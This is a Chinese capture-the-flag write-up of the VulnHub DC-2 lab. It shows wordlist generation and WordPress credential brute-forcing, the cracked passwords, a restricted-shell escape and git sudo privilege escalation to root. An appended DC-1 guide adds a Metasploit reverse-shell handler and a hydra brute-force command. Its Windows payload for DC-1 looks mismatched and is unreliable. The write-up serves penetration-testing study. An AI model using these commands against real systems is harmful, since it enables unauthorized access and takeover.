记录一次Vulnhub靶机实战——DC-2

  • 准备工作

下载靶机链接

http://www.five86.com/downloads/DC-2.zip

解压之后导入VMware

将虚拟机设置为NAT模式并且开启虚拟机。

同时打开我们的kali,这里我使用的是WSL子系统kali。

  • 信息收集

使用nmap扫描kali同网段存活主机,发现存在一台192.168.32.128的主机开启80端口。

我们尝试访问该主机的80端口,发现无法正常访问页面,但在url地址栏会有http://dc-2域名提示,发现问题是本地无法解析域名dc-2

所以我们修改我们的hosts文件,添加靶机IP及其对应的域名 192.168.32.128  dc-2

添加域名解析后,可以正常访问网页信息,并能在Flag页面找到flag1

Flag1中提示我们使用cewl密码字典生成工具,并且在登录后可以找到下一个flag

对该靶机进行目录扫描,这里我用的是DirMap。

发现后台登录页面wp-login.php访问该页面

   

  • 密码爆破

这里需要使用用户以及密码爆破,我们简单尝试了一些弱口令都没有进去,想到这是WordPress 的CMS,所以使用wpscan工具扫描网站,获取可以登录网站的用户名,扫描后可以找到三个用户名:admin、tom、jerry。

将获取到的三个用户名添加到user文件中,使用flag1中提示的工具cewl生成密码字典

 

cewl dc-2 -w dc-2passwd

使用wpscan工具爆破可以登录用户的密码,可成功爆破tom和jerry用户

wpscan --url dc-2 -U user -P dc-2passwd

jerry / adipiscing

tom / parturient

  • 登录后台

使用Jerry用户登录后台发现flag2,使用tom用户什么都没有发现。

Flag2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

如果您无法利用 WordPress 并走捷径,还有另一种方法。

希望你找到另一个切入点。

叫我找另外一个切入点,这里我重新扫描dc-2的端口,发现开启7744端口并且是ssh服务。

  • 登录SSH

这里恰好他的登录密码就是后台管理的登录密码,所以可以直接登录,一般不是的话就需要使用kali里的hydra进行一个密码爆破。

查看目录发现有一个flag3.txt的文件但是没有查看命令,但是使用vi命令可以查看到内容是需要我们切换到jerry用户的。

但是无法直接使用su命令切换用户,需要设置一个环境变量

BASH_CMDS[a]=/bin/sh ; a #调用/bin/sh命令解释器

/bin/bash   #使用bash命令解释器

export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin  #设置环境变量

此时命令基本上都可以使用,也可以table补全命令,切换到jerry用户,进入jerry家目录下,ls 找到flag4.txt

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

很高兴看到你已经走到了这一步——但你还没有回家。

你仍然需要得到最终的标志(唯一真正重要的标志!!)。

这里没有提示 - 你现在靠自己了。 :-)

继续 - git outta here!!!

  • git提权

sudo -l  #查看可以使用root权限无密码的命令,有git命令

这里应该是用git提权拿到root。

sudo git -p h config  #提权

使用!/bin/bash提权,输入id发现是root账户。

进入root目录查看到了最后一个flag。5个flag都被找到了,渗透测试全部结束。

  • 总结

1.需要改hosts 不然访问不了 解析不到!

2.可以了解到nmap -p- 可以扫描全部的端口。

3.使用WPSCAN爆破wordpress账号密码

4.逃脱受限shell

5.导入PATH环境变量

6.使用git工具提升权限(sudo)

### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值